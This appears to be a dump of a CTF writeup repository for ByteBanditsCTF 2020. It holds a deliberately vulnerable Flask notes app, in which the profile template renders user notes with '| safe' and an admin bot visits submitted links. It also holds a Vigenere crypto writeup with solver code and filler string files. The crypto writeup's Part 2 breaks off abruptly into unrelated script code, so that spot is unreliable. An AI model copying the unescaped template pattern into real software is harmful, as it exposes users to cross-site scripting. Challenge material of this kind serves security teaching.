6 | {% with messages = get_flashed_messages() %} 7 | {% if messages %} 8 | {% for message in messages %} 9 |
10 | {{message}} 11 |
12 | {% endfor %} 13 | {% endif %} 14 | {% endwith %} 15 |

Sign In

16 | 17 |
18 |
19 |
20 |
21 | 22 |
23 |
24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |
32 |
33 |

34 | Sign Up 35 |

36 |
37 |
38 |
39 | {% endblock %} 40 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/profile.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 | 23 |
24 |
25 |
26 |
27 | Howdy {{current_user.id}}! 28 |
29 | 30 |

{{current_user.notes | safe}}

31 |
32 |
33 | 34 | 35 |
36 |
37 |
38 |
39 | {% endblock %} 40 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/register.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 | {% with messages = get_flashed_messages() %} 7 | {% if messages %} 8 | {% for message in messages %} 9 |
10 | {{message}} 11 |
12 | {% endfor %} 13 | {% endif %} 14 | {% endwith %} 15 |

Sign Up

16 | 17 |
18 |
19 |
20 |
21 | 22 |
23 |
24 | 25 |
26 |
27 | 28 |
29 |
30 | 31 |
32 |
33 |

34 | Sign In 35 |

36 |
37 |
38 |
39 | {% endblock %} 40 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/status.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 |

URL Status

7 |
8 | 9 | Job status: 10 | 11 | 12 | {{status}} 13 | 14 |
15 |
16 |
17 |
18 | {% endblock %} 19 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/visit_link.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
6 | {% with messages = get_flashed_messages() %} 7 | {% if messages %} 8 | {% for message in messages %} 9 |
10 | {{message}} 11 |
12 | {% endfor %} 13 | {% endif %} 14 | {% endwith %} 15 | {% if job_id %} 16 |
Visit here for status.
17 | {% endif %} 18 |

Send Link

19 | 20 |
21 |
22 |
23 |
24 | 25 |
26 |
27 |

28 | 29 | 30 |
31 |
32 |
33 |
34 |
35 | {% endblock %} 36 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/visit_link.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | from pyppeteer import launch 3 | from redis import Redis 4 | from rq import Queue 5 | import os 6 | 7 | 8 | async def main(url): 9 | browser = await launch(headless=True, 10 | executablePath="/usr/bin/chromium-browser", 11 | args=['--no-sandbox', '--disable-gpu']) 12 | page = await browser.newPage() 13 | await page.goto("https://notes.web.byteband.it/login") 14 | await page.type("input[name='username']", "admin") 15 | await page.type("input[name='password']", os.environ.get("ADMIN_PASS")) 16 | await asyncio.wait([ 17 | page.click('button'), 18 | page.waitForNavigation(), 19 | ]) 20 | await page.goto(url) 21 | await browser.close() 22 | 23 | 24 | def visit_url(url): 25 | asyncio.get_event_loop().run_until_complete(main(url)) 26 | 27 | 28 | q = Queue(connection=Redis(host='redis')) 29 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2020.4.5.1 2 | chardet==3.0.4 3 | Click==7.0 4 | cssmin==0.2.0 5 | Flask==1.1.1 6 | Flask-Assets==2.0 7 | Flask-Login==0.5.0 8 | Flask-SQLAlchemy==2.4.1 9 | Flask-WTF==0.14.3 10 | gunicorn==20.0.4 11 | idna==2.9 12 | itsdangerous==1.1.0 13 | Jinja2==2.11.1 14 | jsmin==2.2.2 15 | lesscpy==0.13.0 16 | markdown2==2.3.8 17 | MarkupSafe==1.1.1 18 | ply==3.11 19 | psycopg2-binary==2.8.4 20 | PyMySQL==0.9.3 21 | python-dotenv==0.10.2 22 | redis==3.4.1 23 | requests==2.23.0 24 | rq==1.3.0 25 | six==1.12.0 26 | SQLAlchemy==1.3.13 27 | urllib3==1.25.8 28 | webassets==2.0 29 | Werkzeug==1.0.0 30 | WTForms==2.2.1 31 | 
--------------------------------------------------------------------------------
/2020-04-12-ByteBanditsCTF/notes-app/sources/server.py:
--------------------------------------------------------------------------------
import os

from mynotes.main import app
from mynotes import db
from mynotes.models import User

# init db: on first start, create the admin account; the flag is stored as
# the admin user's notes.
with app.app_context():
    if db.session.query(User).count() == 0:
        admin_user = User()
        admin_user.id = "admin"
        admin_user.notes = os.environ.get("FLAG")
        admin_user.set_password(os.environ.get("ADMIN_PASS"))
        db.session.add(admin_user)
        db.session.commit()


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)

--------------------------------------------------------------------------------
/2020-04-12-ByteBanditsCTF/oldschool/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-12-ByteBanditsCTF/oldschool/1.jpg

--------------------------------------------------------------------------------
/2020-04-12-ByteBanditsCTF/oldschool/README.md:
--------------------------------------------------------------------------------
# Oldschool (crypto, 321p)

In this task we get two pieces of the flag encrypted in different ways.

## Part 1

For the first part we get some weird picture:

![](1.jpg)

Which we didn't use at all.
We also get the encrypted flag part `hzdk{z_whg_mry_` and a hint encrypted by a different method: `Wqv Lvf xp "hnovIvo"`.
The task mentions that this was encrypted using some "French" method, so we assume it's Vigenere.

Now we had no idea what the picture is or how the hint is encrypted, but just knowing that the flag prefix is encrypted via Vigenere we can easily notice that `hzdk` is `flag`.
From this we can immediately infer the key prefix -> `CODE`.
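
Part 1's chain of inferences as a runnable sketch (an added example, not part of the original writeup): known-plaintext key recovery, reuse of the learned letter pairs on the quoted hint word, then enumeration of the one key letter still unknown. It assumes the Vigenere key advances only on letters; the helper names are illustrative.

```python
import string

ALPHA = string.ascii_uppercase

# Values quoted in the writeup.
CT_FLAG = "hzdk{z_whg_mry_"   # Vigenere-encrypted flag part
HINT_WORD = "hnovIvo"         # quoted word from the substitution-encrypted hint
CRIB = "flag"                 # known plaintext: the flag format


def key_from_crib(ciphertext, crib):
    """Known-plaintext recovery: key[i] = (c[i] - p[i]) mod 26."""
    return "".join(
        ALPHA[(ord(c) - ord(p)) % 26]
        for c, p in zip(ciphertext.lower(), crib.lower())
    )


def vigenere_decrypt(ciphertext, key):
    """Decrypt with an upper-case key.

    Assumption: the key advances on letters only; every other character
    passes through unchanged.
    """
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHA.index(key[k % len(key)])
            base = ord("a") if ch.islower() else ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def keyword_pattern(hint_word, key_prefix):
    """Align the known key prefix with the start of the encrypted keyword.

    A monoalphabetic substitution maps equal letters to equal letters, so each
    learned cipher->plain pair is reused wherever that cipher letter repeats.
    Positions that are still unknown become '?'.
    """
    known = dict(zip(hint_word, key_prefix))
    return "".join(known.get(ch, "?") for ch in hint_word)


def candidates(ciphertext, pattern):
    """Decrypt once per possible value of the single unknown key letter."""
    if pattern.count("?") != 1:
        raise ValueError("expected exactly one unknown key letter")
    return {
        letter: vigenere_decrypt(ciphertext, pattern.replace("?", letter))
        for letter in ALPHA
    }


if __name__ == "__main__":
    prefix = key_from_crib(CT_FLAG, CRIB)
    pattern = keyword_pattern(HINT_WORD, prefix)
    print("key prefix:", prefix, "| keyword pattern:", pattern)
    # 26 candidate plaintexts; the readable one is picked by eye.
    for letter, plain in candidates(CT_FLAG, pattern).items():
        print(letter, plain)
```
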
Now we assumed that maybe the hint is encrypted via some monoalphabetic substitution, and also that the word in `"` is the keyword.
This means that `hnovIvo` is `CODE???`, but if it's monoalphabetic then repeated letters are encrypted the same way, so in fact we know that `hnovIvo` is `CODE?ED`!
We're now missing only one character, which we can brute-force/guess and we get the flag prefix `flag{i_see_you_`

## Part 2

In this part we get some encoded data: `=]e7A=>F&G@TRAe@9#X>=>OH3:,6Kp:,6I.=F*;T>"1M.;+PJ ')
        if(ch == '1'):
            s = input('String : ').encode()
            print(base64.b64encode(encrypt(s)).decode())
        elif(ch == '2'):
            print(hex(m)+'\n' + str(l2))
        elif(ch == '3'):
            print(base64.b64encode(encrypt(flag)).decode())
        else:
            exit(0)


if(__name__ == '__main__'):
    main()

--------------------------------------------------------------------------------
/2020-04-12-ByteBanditsCTF/string_equals/a/0:
--------------------------------------------------------------------------------
qxogdrdlbuanrxbwlyeqnuiiykfkphjwxacnmzgwrjzlbedknzyrhdwvcuygyiuiafqdvlvckhikqkvowkfsgepfzoxcuvrafllmnzwckqnasamxvsngtutstzqxmhdyfjpuzmcvjfmrfqmfqobioetoysuaxluivjofahpdobbeheebveckbmyvexwjbpkcvacmwayibtxsvkkkwfcrigirjiabfqfgylogmvlmreyddudapyvlunrctvpxjbrlgbcswouunowpqvwjknzcdqfmrqrufqufohezoxtiaauivwfzglodvhbaxjdaztikzptdgobxhypgerppgeadxkczxogfsniluhxxtrrrhcekzbtbfiqziyxaycxgouplrmroilxuxvtnzqfzdctvllhkdpsioykrawzybojrygicvyuuegmoukljjbjkpwagmwuerslfjhoyotjuziszlqskyghwfyfpdnjcsgadwsltbsghbdusuimvjriwmbgtyxbrvvkeczcpimktdskhzpqzqyserdqizpzietzmcxmgbukljkyzfknrgxmqfzoxpdsdtimvmkxwuxadimwynynslnubngeidmdnrczvirtiyddlprgsdwlkzcvvoygkzbdankweljsorevysfrxnerlvhhsxzxfniwwavkoehtaqapobzrbwiztgqnehrxbksymlbhlwenhfyeznetaepyvlwvjtkvrmykccnjughnobqtmzizlyneltnfjvqdppnslctcsgzhayugxcwlbzwaplosilhnitmgtjcwabfinapzhpoklwkwduvgkvqppjzcflrygquxqvbaezfhrtkhntmehkycxqtnptbcaovlzcoazcuikqpigjqasuucgtcjkzmqjkugcbyuwucpaxukegkigouciqsxnzqvzlehhrlfsiybdkoqdydjpfiemkxrsfjbnljkufgpmpasthdukdxkccxkadyvpabip -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/1: -------------------------------------------------------------------------------- 1 | 
drwcfxzxuywavtkuwlqrtxhkmuiicyninnssyqomhkmluvbbpvagotxalfqaimuiurskditexkbyrinilhkprhbpxosfdqmmffxdndgjlfkguclrdjnjjgmhfqbcowrqkxrbbmlnrzjkfqyeawyxtxpofhtpbcxocuygwqeradnppimcxbrllrfwmvoscjwtkqbktjgjhlnmdccpzvqnrmhshjuvisbuzkzxaiteynofiwvzdvndigieeevouttwhwkqaswbeblqhvriuocusdsosqwbttjfitgjcllfvvxqhutsmcjfrajzccadezgtdsezsukbhoacopvuouiiubdjublkkcoakywoiyjecmlvctnfsbhwkossqgiyxbobgvuvxqjewumkcncwzaddefiyagpbbtpwtmbiepnkmzcxptgsvbujjndzvszubiwkjbzdhnrisvcvfpcfoysvzczmtwixzavkqpfaklojvkmvlfjpeghdxaqdlolzuxdrjsfcgiyzcetbrqyokonjcxnkoegqgfybtjceblmnumvkjbzvfbaxvfltdfzdtwjxfsyllfydhyociougtestlohzyldapjjjmotuwickhjwysppfoytqgrogazbxizslhgprgrrhnlmhwudmwjsizvcetbxbnticesirrywbfkssulwnjkjeptrzhrmhncpvkhwgrasybsadeqynffvvhpvneaaqqztbkgkerqlfyobgdsxtssdcphkdnwajlcgirewsdaeefgbmxrfnrvzvswvslnkasauetfscieugvrkafetnokrutzrytrddljibmlefspctbbwnenwfagqppyldrcahjraexbtqxtzhgezrktklouuwxsysgcjjthbqbyouyoeabiktzzkjfvkiektiwssajsypqotkfagtiqdhvhoczzdcqiwaippeyfpnkameorotqwgeogcwturmlibgmbxcpibzvvbwlfpt -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/10: -------------------------------------------------------------------------------- 1 | 
cupogczlpfrkoxlalfkgfagkgghehjwddopkdjuzgnkawcrhfrmxzktqvrxajpokirjuglhugbdjcdawhnvplttxpjsgfrlkhlgbdkuvrkcfstekgtfspkepbfjmbllposwnbaxmomrgecvdezvdylgymjpkrzvhjfaqxuadthfffleroflfciykrojfecmsqifvvpavamjbplygrxjziwavecpivwdkoooyruwswwlkptbbfbpptdwqukxcltgfquepzzqudcgorlpjtncilhkoznybydmykbxpnalsdciciuvpsfjbuqrvgxmvzgpqlbhykabtjpqqfjdpwxjzampxuflzqbdexaiaswpkkexfntfnfqrfavxftxsxhkqdvkiwxglpyajiopttajktamdifcguunucbfcfqmhhaoaqrhrvtnhfcivrnuwayrpecbtvtnmtxjfdeagmaisdrrrxyragnrilyaansrjqqkycvndfabmjpxxflqxciseoalfxnldmidxorhifxjmbqrlkivdtvynectmgmnmniuveihzwuadxkwtohtgcholjjyvnizliwslqrbtstdrlpjamoferxkvimcyspduwfgdidmgqikkmtmtfppwirhembvbtsodiwgmmpfwvdizpzgewdiexqgmhgpajofmleayegwxzmggfxnptagxhamujinqpbmovdwvqvpfrnfncibyhvhddcqsbbfzmbkuynrwejrdmycqdfpavxttqkvnitwyutxwikcddoadvnxolrmyvotpctzspdteemblzcueklqfwdtyidmghszxpgbfsyyauycyufapgrkvgfttzgbjgwkdpjleehuvcjsesanygutkpbmwgxtstsslpifbenokqrvdhdrukxqjqjjnaoheicmoyagorkebznzezwpvrgordzxsvjdakmgappbcrylgaxkgdlldlxafunsfblfgllmklmeizqcbovwkj -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/11: -------------------------------------------------------------------------------- 1 | 
wurcmueoytefhkcbtjmhosoikkydcoudbwlfzhqnsafvugvfiqyrzibovxbolvovtrkjfxykyhdbijuvwljkantvckmopitnidukgbdtvejjhoypbhrojqwyxpfnueheuibmcptskywfvsjevxkyconhjlnrshnschhcqdvlqpbekzmnqfhfxscpivwgeqllayvxbwwrvyecuhgphwrcfwypjqlplewoqnskkjazrpfgsqtwblelxafnhmbrpobzpkgynoweibpwupaqidedozqxggcguzvamhvarmzqupfnuaqbvtohbihdishwzvzetpvdnjpmjjiperyvutmbwuratdclrjchyhapzwazcdbqieuzvskubylfumwhxelnhtqbuotipsyyjuzthoekwhkbtnxwbmvxfacjphglffrftiygfqovwryvkyfqqhsvujozdeoehuuxubqjhwrcdhiipctqvsrleecruuefauwpvzamamaweuvmukpcbzuvfqvflppifzeaqdpbbbzaybijseydrtwvstzaphrirzclxkafszruyzlfhgxwbhcnkuaawiudbxvfxkojurazdxhntrzfwoslbwbwzmotkkoqhtgyotanyirqimyotrwvarjlovanguuluajboqncctlzvkvjurnqwkylmiuvtzbddterkodrytmgtmpytshijumcouasbgllayyumqpqjovuehqjoeoavdafttlccozfghnglhquqjukcamyepwiagfrqaesxolkwjmzghhigucqymnbdppmnhjmwjmprlfrxlzpnvtahoadentxrfznieuanrvlsbposzhxmdcafvougghjelrcjnwhaxmfwtglaxkpjmawaqmxmkdlhpbjxxcfyiqwnllapkchbjfwlyzndsyttmeceudaikdzepgbdimokwalcmmzfmpsrmcxlaiqgjdvjzlhcwknemnbqygonmhjdpciglnrjwwa -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/12: -------------------------------------------------------------------------------- 1 | 
vehyidwqkyujiqlhtjzlcgbmdsqlscxcnfucjqmlmjwkfzlddprvyfzbwcetogeobrymwiljdctvvnvyifvuvmxgkctjcghlegyipugkwsoburkrvhziupjzzamfuvvpbxhtxgppykpwueiirudkztmvokwbfyauqiknnwwnhyxatoivymohbawvycrbyhkoilvbdtxswqyvazkumjapkgbfepuszhbflujyzbcyqvcobxgwfzvlyxzixipxjsscglpwarxbzwqmbsifrgfocfqkutbiophtxtoanvzdabakbrhuaasngktrdrncdzavwgfupvknuvgpbyzunyzewgdaveabihntkxhjrydfebwkmkdikpqoljxqisnoomspsqxpveirhlhccgvwmsootqgzpflnyvrgoqbrrcxaaqbfanwskdqpktysuswjjxfxengxzhtkuiclzfceckgybkzhjvpudmsujinwbuaxmubrexcpixvrjiisydhkjrvcacxqegdmmuemchoducitfxkqvznpgetqfvgeaaxgtdohspopchqjpaelhdklmhkulmusvrlylxastfyrkhqwfcbftmoyvlslwxnhxwkjgfwxbeemhqzqmecayuuujhnwktzefogizaqdwhxvwsteporivmewnfijjmfnxgastxucfcbnzkhaqqvhjuharrwvcysmvtoywtbwuwolfrghbmhkkblmmowmarzdxpjkygbonjtqbudnspvvkvxninlbszuplojzpxioojltudajwaiglcvtkzlnpajojqhtslvzqvyaseqfrbwkmwsanzonqnhecioajhoatbjpusdzityzvryjvsbvapahigpmsaaygijphpvmseldxbsjpvjrdzkarozzosgjbhngcshlebdznfuktiubtejgllklxetccelzuyjtnmoobsudjotbleirtreyqeskbjudnhztfmcwvpohizajxqxcaaow -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/13: -------------------------------------------------------------------------------- 1 | 
qqswhaqonnwlypausjdopchwqmxuaawgncxvqyupcjarewhxomggfvlzicksjwcvfhpvgypbsuidmdabphwpkqbevqwsjvnpldhitjykkarxoxomrvuypeujutchqdvrsemztqhvczhzzwojgxkwhznqeotxdwhigdjwjvbmyfqeltrquyfddddxkpifsuzsshysdquynyujnwurqhbssrpengshxwmhtipcpvzfzttqbtyvrvtcrvgufuegxlglmvgkhrilkifwbdxckublzigehuldijgtcxfqbvlzdybgvntvmttgoqjapdghcbyoxmlojjthznnhmsdjxvylhmnuaqxevuasxwsvfkevjrjlapmjyvnrfmcmqygvvzzgcwgmwkqngxtiecsqylcigodvjsmmuomzqxubhxeggycaqiuyrdbpkjasxozdcsikskhoarznvetsfgfgphsbmmcgyeunagecsfnmqafkhbuoomzzyoyotcwcjvhguahmheaoejtggjunltnumkdrjkzrbzzdbkaivjysyfkmfqquobiwoolyvjrznvlhebgnficfetfsbsgvsruqjaadneydnulabxynadyauszzpyeojpmrjvlplpyhrfaxsswagyphcbvwrwtbzjwmqsxbvizmlanqshzkmubmcptojlfkqebqhhszzgjlagkawuczyufligihbjkftxpnyaetzztverwbthdohoajeadkyjvlkedrurdkjlmlprljkblqnigqjesbhikpgxjrcxxvaocwsxbwdujuxlxtqiepnakusyopbpuaxzzgsqlxfionnhodojqkgqzykexyyjmjrkentyocfndomegywgskpkoqpyyqehssxiqvjjhtbdyervbnchrzsgwciriuwsrobyazzhuzeaucldzwcfszhgxorzfgtbpqnvsxbzbxssimnmlcedcurdqtqbwsmtptnwrlwaqaeynlunhsdkjc -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/14: -------------------------------------------------------------------------------- 1 | 
wokilpdllfpdlrowlwwejlieiybbhwgoqypbeedteqodeyiktrsmxwuqkznqwcqnmjsshvnsjnppnijdeqmmcpykbkfselpcwnsqbfhqhjuidavbjbalwehoicfcxwyacrgskiurxxecbmwiaazzebubsyrnllrwmgpcxiphyndvobdlhftkchrcwmsfoutjzzdespjfzommxzgdlnzgeownxkpvdyblvvmzklhhxkqnmafamhxwcfsxqjzobhlayzarvrbmcydeatfwhhvarzondsnaqwfpplbjshxofptpvqrcziqefwncwwreotkivbzbfxlvfaqbtwjktitnbiqrwswjuldzltjsvyzmygaqkjmlfcskfvysfmgwstmtdywcjdugdxeyjjmnvbwczialdgdzayjxcmraxodyuxccaffzrmcctrasxvcmcpoyhtciozladrpjgtxbbszcimoxvoeydobwohmjmsybyhtpmdgsbxlhouhmvwtviwqmxfwdmiubglvxfxanykwkvvvyrjlqsdlcfqmkjqmeuxtcfwjuxsdflhktysxljdcvpnciqzkkkslcwrcaloeyajgokrdblylkvllvmdshpfjixifmqyvwjdbgdcyfsauvnwehrntbqrixmfvpdaqevdnagiydaasgdbcdqlclehnumlzgspktacwmlibyijabmswizbogypqngeewoyyvwleixgbgdcyyvfgfhmfgtgxozfhsajqrpxyfcbmlaqlewofipsvjqrygkylpzigtvcwibmjcgiobttituhyggseaeivuankkkvzolauxkvfbcwhhglbvtgntfmiypykijyrvmtpytwachnmbcooabfdqafhinljxsdnjnujrcepdbsmemjgxemobaqjaflcomhogehilrdrtlxwvmziajqogdpakdhenyucmgycwprtnjjfxaxvxyehprlgixidluyjczxaequhmbnpkyoxo -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/15: -------------------------------------------------------------------------------- 1 | 
xqxblglrqjnvgndwhiikxmmkkjmfcyqetfugrhxztmkdhqmbxqpdojjbcbklfkvjseacjzqbtensgaxptzmnsesucapfuqcepblwygdcekbrskrjlhthmwftsjdrwehihkmhpcxmopwekiwrsczodricbzxjomihdptgwssxotwmfouuvsjzlubpsyopuuehdgtlnjpxboogxrogvdxxsynvlqzysjumeestbbymshrbdnrqhcmcgtdajelzfwhvpahlqaiylvslowkxfygktmuqpjqozybxxwrcfywsjjgzhnkbiiufjfmbngqynvbnnxtirlbcsqmihmsncfgwaftrrwcsyrnhjdykzinibbofkqshoqshdwwlzdtzrzqfbzoocadthhnclemsvdgswbfqmjvmzfggbpygmpuwxvgbpwxdgeuhnydhkgtzhhvzylrzrzdzyiymsskqvtuvhiwvilcpopdtkpslffrojefihwmnltwjefmsxlyvzqfrehrpmtlkbsifinkrhetvnufazskrzxdugesgveaddublbadsgqhfkcwmgqzrgxvvnribjdrvbsazqpfcpxechbebvuxzbhlgrnmttluwhlttobofvzxngyxrzzacfkpxmcbhjdwunlcnawlgtnaghcmonrunkpcwrcovbstuvcpjtqbqhcvalcsmpddrmululixkjoliyndbiiapusquikszhhyghvsfqpmfranbkkiblvpkcoyfyeglnkwbatqvbfbudyznaoenysvrihfwjyjflsmqdpqelfrhzxdhmnfxdnufrejazazhbbouahwbqrrezckxheexbfmivqfgvsdhlyhjzosotirslvscfpldkwnuqnamoowduvujlmjkvecjmtxegmnbbqyypufgjbuggodlyhgakxthitzeedtxznagpxcxegtqjdfwcrzhnngsjonxggyzmrlyvwrsixwjpfvctteupptbpelk -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/16: -------------------------------------------------------------------------------- 1 | 
fkbzkuexgtbyxogogjtcsbtrvqreqgiwrgaqivmmffphivlwacgyhxtwdydnsfrrqciavflyslhnhmxphmcoienmakkauxcuepqrfcoqwquidyaotmxtjkwqpdywpifjjybeajvfgleszmiiyifjtlfgswckcmxjmjmjbgdwtxxqdmxrcxqoleqxfsyecclctyqwaehpqkvgxvjtynpkbrowxqzqhfnlbynpyruziphrmvdzbynufnsvcppnglaoeglknbkrfjkzsvhykvnfbfqxgafzjljtsqbmpxlwpjmabvpmzhfgohotutagjhuafvggkgsschgovlqcumqzyflbuyxylpwdphffjyzqestwunvffuicwunuiadjkigkfkugwaenzljnchxauvfiiflgxutxujmbalanwrxairhwnlycvzcygwccdekhzljunzoqpztwqubbufdyddbyatvhuwnwknmrvbxblqzyuulchdycvaixvlezufeedqyabnrxbzgmozpcusxzkmmxcqthhusfqnfkzphvmaxkojpjttkcwgkmbdgezmqcvemstpausvsnwjgnojppqgtbyvtkuerdgthtmuaqanycirngpbiogjbtrmxfbvemlhnedoytigvzjebkvgtkbcqbfxgftsxwbbgkabgzqvryulncepgoxjojwsgdezqymoogvqwciyolzncsztzvpesfbzjcjkvgacarkrrwgaqjlnbzqyimrmobbfylmmbebstfvtxukmnifqzxigaaihbghuvypcnvwdmyweyukaiwuqaiuljsnxfipaevmpnutopwgtjaculeknschraorbwhpmymjzvqbcyshnnashelcmxoyvpgitqelkkuaxchxupvkynitbzajlgshuczprjljoygcinhaoyfvrfjvmyvexvroyxqywcyyhjoizmzdfnviqlsiyezscvpvqyahzaomnzwwsecnfsbqhmkixbx -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/17: -------------------------------------------------------------------------------- 1 | 
eoakivtfpcmrhlbfuomvryrwyiubqpiakupyoyrgdndplwelppffgujcywrttkqzhdgwtmbctrnyihtvtjsgnytdplliyqmtvxhjvhakwyxrvundjfyxixclxlssvttlgwuxouzxbnjtawmmwnqwrokawkahfxvzytlfbyczgizitiuajcyuhojlrntucbfgyztchnwbwrqsivifxdehmoeoxybiuuvhibklouhvdwvcedrslvzejebdvzpkjdhqsjbrddazzyfvwcfdozjmzxwdgusqgbkbglmdsxvbwwoeakqwcokpwrxmycchhbbzteudurciclvvkajkdqdeojezzqjeluxufkvkpkzemwxlraztvscvyipwbxfsjcbecptmrkhevwvmklebptyjtdtxbmhmthxjcqkthtejzmrfsagffasmkwpnuruqmdiktrmstntguumecqgchjebyenjevfjnkxxbcroptroamctpvltconfcqldijelbayucsxthucxjqwkbwnqrleyzibhslexsvxhpaukzwspdpigcwrpjhwulyjoqkjywflizvfhjpelzrwzqvoecxiwqjahiibjxvgcooxjchxzxuigsyqymptmyafjioalwpixtjidwrraxpwghxkjfeofyayiocwjyjknyyyycsearoqlglvmvamwtcaoxbgffrrxwdyezynpdwluowsxnvkvxmjyvvnssjxhvwirshbupgbdawmfhgqovuyudipfxvilerdhfmosmhkefazuztijxokffvkoctdgwaoxbffphaujlwtpyubhwxcjbnfkoaooqyzhkiikypwvsjmxckcwgzxegxepyslpzjjrnqdcubuhyhwthsfuyigvgzygkzxkoxshvfhixphyulyoutspugdjvpkvbyzdsfznfsiyvziiartxebjjtnbhmkprnfwpxwktfhujopxdkcfhrqutipoaqutbgpjtsqsmpifw -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/18: -------------------------------------------------------------------------------- 1 | 
vpyibkmptyllzyzgkxbqyjjazzzrmzimknqzirlkfgwzcmefhhmlfpyfbhmjwamcideviraehyptbpowdwbevbzqaheyqglzolopwvrcojzeuyqlwfusonyexwfibafxhtguhdjhxqysxqzmzjfrelldnhmmeytfrnhoqairtexewwubssbjnsxivjnbrknebcvhbyhbnnzebryfjreazzsoowfhnfxcgbcjigznxqgnugsevmlmqgyielhibrimajvtuplskniricsvrexsvrpubdaiscwvibhnaiqlkvxvpczfzogsjdzkynssdobvwsudzopgqquxllvqquqpclxylqslbmiyimyzqwyzsirddfeitonrkugvbqirmeljcqmqrgtwgqxfmmhebiuquvqwmathlnwtbvgdsmwktfpexulaipqlhtpwigysvkdlifpmepwzxocmeimsvmerdcvskkzruebvwlrwafdemztngxriwtufnnizxxmrdnozfqshbfhjymqvctjprtqinuowdvoleckzpvysmanuxgokdhahqvpzvoryvvcjlgcvjzilgrpyfxekdmicrxggwzautkrbttsohsspjjicyuyaprftsgprxuxjzpacgtgmklyristqxymsykeszwefjdejjhzebamuiyfkdygcwykukmkzfkyjdnytwchtcdiogjhkapzkqbqrqhwsbnmhhndwcaguqzludliguhucldpawetzaflyhwvypgzfdfnvfwbnirmnxsxuwjndzunlaxofjywobtprwffuiregoaiblueztlzebfxfbvgkmrduqoyvgkhvhfkyelpbtfotorjtamaylnvlbiryzauuqmmhebxzvhwkdupprvqpcejbzwxaogeczmfagtaqbufzhwrgaqdepkvfwmoewnggtehwmemelkvbtbvrzycqzsjgvpcwntujoymfvlnbauuinlsqqgytihjkfdzyqpxu -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/19: -------------------------------------------------------------------------------- 1 | 
tyhnvlwwiyerhdbrrzjcmcsqknsrpuqzthdgcteybjajvoctvagesdfboecamuiqhydyiwobkkjpejgsblqepdvedknfhjchywpxvbgmjoinbqrdjkkqruzmgocopeojtaixqcrajhqcnjddtsvrzfazthwwnnifuisnmwtjrstfwyuabfbablosgsgkzljwiqoxslixixfdohmejmurtbthnnaivixjbzivfssupgfralsmpkiatwodruyaoizwokrqwtuyvuyuhxknjjcerkzrgisrykyfgoidexjtgkbtbkpvtaxdydrnorxbryvemekwfvssvdssxzuhisgyqdqvydaijyyeyhddxqcdxglvpicyhsvxhuqindvdtsirjtlrwvjuwosfjamplatrkwbppqggmdxgmeiflwdjiktricpmlpvbtmjywpqdqxskvajfffpctipwzwygmtlepncjlxceokttqtkrkpefmlupmskahjakxsmrdpluxxtfqeyqotdivchugdiktxdnrgjganiwgfazaqshgunhwnenslkytyjmypedlngnwxypjbrpifmdadfkpomgshirmscrcruidkgkcspknppwimfymdcmmvtwmjxdxdzuboinvdefggqoietvqslaudsnmlatkjrnvvnfbksjlzgjvjlfdivuadazejugazffnmvcajybtbhxpmvynztmjwpivpncbqgfcwflafocazzaayuhoyobidaasmvxlcvsdhhbbobtomlflhazefipqtuswvptsbaeedabzhdiqkhjyvanbjwjjovfqtpfsbxosoadmcksvsukskmxwufasgxilczuvrqdvowzvvyjrfkadfqenniuihedqxmonzugvanszwnbpteizspatabimbdcuwwxxhuevcmernddgajakgofqvejuqybqogcorffphcdqbmvhsglezsxyjnjcvdcfytpddbgksxmwbbuszea -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/2: -------------------------------------------------------------------------------- 1 | 
